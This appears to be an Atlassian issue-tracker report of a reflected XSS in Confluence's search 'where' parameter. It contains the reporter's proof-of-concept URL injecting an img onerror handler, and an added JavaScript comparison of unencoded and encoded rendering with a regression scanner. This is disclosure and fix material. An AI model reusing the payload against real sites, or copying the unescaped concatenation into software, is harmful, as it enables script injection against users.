Reflected XSS in 'where' param of doSearchSite

2013-08-09T04:40:10
ID ATLASSIAN:CONFSERVER-30318
Type atlassian
Reporter olivier2
Modified 2017-10-16T03:51:38

Description

Olivier Beg <olivier@hotmail.lv> reported
{quote}
{noformat}
https://confluence.atlassian.com/dosearchsite.action?queryString=%22%3E&startIndex=0&lastModified=LASTWEEK&where=conf_all%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E
{noformat}

> I assume it is DOM based because it works in Google Chrome.
{quote}

This results in

{code:html}
<input type="hidden" id="search-filter-by-space" name="where" value="conf_all"><img src=x onerror=alert(1)>" style="width: 100%"/>
{code}

which appears to be parsed as having a valid {{onerror}} attribute (???), which triggers the alert box if you move your mouse or just wait a second. Checked in Firefox and Chrome. Possibly {{where}} is used in a JavaScript context in an unsafe way.
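
Added example, not part of the original report and not Confluence code: the hidden input from the report rendered with and without HTML-attribute encoding of {{where}}, plus a small scanner that can serve as a regression check for the fix. The function names and the string-built template are assumptions; the actual Confluence template is not shown on this page.

```javascript
// Constructed sample: decoded 'where' value from the reported URL.
const REPORTED_WHERE = 'conf_all"><img src=x onerror=alert(1)>';

// Before: value concatenated into a double-quoted attribute with no encoding.
function renderUnsafe(where) {
  return '<input type="hidden" id="search-filter-by-space" name="where" value="' +
    where + '" style="width: 100%"/>';
}

// Encode the characters that can end a quoted attribute value or start markup.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeAttr(value) {
  return String(value).replace(/[&<>"']/g, (c) => ENTITIES[c]);
}

// After: same markup, value encoded for the attribute context it lands in.
function renderSafe(where) {
  return '<input type="hidden" id="search-filter-by-space" name="where" value="' +
    escapeAttr(where) + '" style="width: 100%"/>';
}

// Regression helper: names of the elements opened in the markup, skipping
// quoted attribute values the way an HTML tokenizer does (simplified).
function openedElements(html) {
  const names = [];
  let i = 0;
  while (i < html.length) {
    if (html[i] === '<' && /[a-zA-Z]/.test(html[i + 1] || '')) {
      let j = i + 1;
      while (j < html.length && /[a-zA-Z0-9]/.test(html[j])) j++;
      names.push(html.slice(i + 1, j).toLowerCase());
      let quote = null; // scan to the '>' that closes this tag
      while (j < html.length) {
        const ch = html[j];
        if (quote) { if (ch === quote) quote = null; }
        else if (ch === '"' || ch === "'") quote = ch;
        else if (ch === '>') break;
        j++;
      }
      i = j + 1;
    } else {
      i++;
    }
  }
  return names;
}
```

With the reported value, {{openedElements(renderUnsafe(...))}} yields an extra {{img}} element next to {{input}}, while the encoded rendering yields {{input}} only.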